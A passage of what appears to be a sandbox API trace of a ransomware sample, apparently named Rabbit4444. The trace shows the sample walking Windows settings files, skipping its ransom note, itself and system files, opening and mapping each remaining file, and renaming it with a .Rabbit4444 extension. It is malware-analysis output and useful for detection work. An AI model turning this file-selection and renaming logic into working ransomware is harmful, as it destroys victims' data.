"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.472] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e519e3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55e519e3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x342, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", cAlternateFileName="CLC050~1.SET")) returned 1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2=".") returned 1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="..") returned 1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="windows") returned -1 [0059.472] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.473] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.473] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="boot") returned 1 [0059.473] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.473] lstrcmpiW (lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.473] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms" | out: lpString1="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms") returned="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms" [0059.473] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.473] lstrlenW (lpString="Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms") returned 64 [0059.473] lstrlenW (lpString="Rabbit4444") returned 10 [0059.473] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.473] lstrlenW (lpString=".dll") returned 4 [0059.473] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.473] lstrlenW (lpString=".lnk") returned 4 [0059.473] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.473] lstrlenW (lpString=".ini") returned 4 [0059.473] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.473] lstrlenW (lpString=".sys") returned 4 [0059.473] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.473] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.474] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15078456907) returned 1 [0059.474] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=834) returned 1 [0059.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.474] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.475] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.476] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.476] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.476] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.476] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.476] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15078701405) returned 1 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.476] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.476] CloseHandle (hObject=0x298) returned 1 [0059.477] CloseHandle (hObject=0x278) returned 1 [0059.477] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms.Rabbit4444") returned 192 [0059.477] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.478] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55eea2dc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55eea2dc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x406, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", cAlternateFileName="CL25DA~1.SET")) returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2=".") returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="..") returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="windows") returned -1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="boot") returned 1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.478] lstrcmpiW (lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.478] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms" | out: lpString1="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms") returned="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms" [0059.478] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.478] lstrlenW (lpString="Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms") returned 64 [0059.478] lstrlenW (lpString="Rabbit4444") returned 10 [0059.478] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.478] lstrlenW (lpString=".dll") returned 4 [0059.478] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.478] lstrlenW (lpString=".lnk") returned 4 [0059.478] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.478] lstrlenW (lpString=".ini") returned 4 [0059.478] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.479] lstrlenW (lpString=".sys") returned 4 [0059.479] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.479] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5ae651d-d027-4d11-8125-595b9933c78b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.479] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.479] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15078966408) returned 1 [0059.479] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1030) returned 1 [0059.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0059.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.479] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.482] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.483] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15079456553) returned 1 [0059.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.484] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.484] CloseHandle (hObject=0x298) returned 1 [0059.484] CloseHandle (hObject=0x278) returned 1 [0059.484] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms.Rabbit4444") returned 192 [0059.484] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5ae651d-d027-4d11-8125-595b9933c78b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5ae651d-d027-4d11-8125-595b9933c78b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.485] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55f82c44, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55f82c44, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2230fb7c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", cAlternateFileName="CL9E15~1.SET")) returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2=".") returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="..") returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="windows") returned -1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="boot") returned 1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.485] lstrcmpiW (lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.485] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms" | out: lpString1="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms") returned="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms" [0059.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.486] lstrlenW (lpString="Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms") returned 64 [0059.486] lstrlenW (lpString="Rabbit4444") returned 10 [0059.486] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.486] lstrlenW (lpString=".dll") returned 4 [0059.486] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.486] lstrlenW (lpString=".lnk") returned 4 [0059.486] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.486] lstrlenW (lpString=".ini") returned 4 [0059.486] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.486] lstrlenW (lpString=".sys") returned 4 [0059.486] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.486] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c86b1923-8e1f-414b-83db-94b09ba73e15}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.487] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.487] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15079730389) returned 1 [0059.487] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=998) returned 1 [0059.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0059.487] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.489] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15080106945) returned 1 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0059.490] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.491] CloseHandle (hObject=0x298) returned 1 [0059.491] CloseHandle (hObject=0x278) returned 1 [0059.491] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms.Rabbit4444") returned 192 [0059.491] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c86b1923-8e1f-414b-83db-94b09ba73e15}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c86b1923-8e1f-414b-83db-94b09ba73e15}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.491] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5601b5b3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5601b5b3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", cAlternateFileName="CL987F~1.SET")) returned 1 [0059.491] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.491] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.491] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.491] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2=".") returned 1 [0059.491] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="..") returned 1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="windows") returned -1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="boot") returned 1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.492] lstrcmpiW (lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.492] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms" | out: lpString1="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms") returned="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms" [0059.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.492] lstrlenW (lpString="Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms") returned 64 [0059.492] lstrlenW (lpString="Rabbit4444") returned 10 [0059.492] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.492] lstrlenW (lpString=".dll") returned 4 [0059.492] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.492] lstrlenW (lpString=".lnk") returned 4 [0059.492] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.492] lstrlenW (lpString=".ini") returned 4 [0059.492] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.492] lstrlenW (lpString=".sys") returned 4 [0059.492] lstrcmpiW (lpString1="t-ms", 